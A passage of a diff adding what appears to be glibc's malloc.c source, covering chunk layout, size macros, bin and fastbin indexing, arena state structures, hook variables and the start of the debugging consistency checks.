+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Check if REQ overflows when padded and aligned and if the resulting value
+   is less than PTRDIFF_T.  Returns TRUE and the requested size or MINSIZE in
+   case the value is less than MINSIZE on SZ or false if any of the previous
+   check fail.  */
+static inline bool
+checked_request2size (size_t req, size_t *sz) __nonnull (1)
+{
+  if (__glibc_unlikely (req > PTRDIFF_MAX))
+    return false;
+  *sz = request2size (req);
+  return true;
+}
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceeded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
+
+/* Take a chunk off a bin list.  */
+static void
+unlink_chunk (mstate av, mchunkptr p)
+{
+  if (chunksize (p) != prev_size (next_chunk (p)))
+    malloc_printerr ("corrupted size vs. prev_size");
+
+  mchunkptr fd = p->fd;
+  mchunkptr bk = p->bk;
+
+  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
+    malloc_printerr ("corrupted double-linked list");
+
+  fd->bk = bk;
+  bk->fd = fd;
+  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
+    {
+      if (p->fd_nextsize->bk_nextsize != p
+	  || p->bk_nextsize->fd_nextsize != p)
+	malloc_printerr ("corrupted double-linked list (not small)");
+
+      if (fd->fd_nextsize == NULL)
+	{
+	  if (p->fd_nextsize == p)
+	    fd->fd_nextsize = fd->bk_nextsize = fd;
+	  else
+	    {
+	      fd->fd_nextsize = p->fd_nextsize;
+	      fd->bk_nextsize = p->bk_nextsize;
+	      p->fd_nextsize->bk_nextsize = fd;
+	      p->bk_nextsize->fd_nextsize = fd;
+	    }
+	}
+      else
+	{
+	  p->fd_nextsize->bk_nextsize = p->bk_nextsize;
+	  p->bk_nextsize->fd_nextsize = p->fd_nextsize;
+	}
+    }
+}
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given it's sole purpose is to reduce number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunked are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
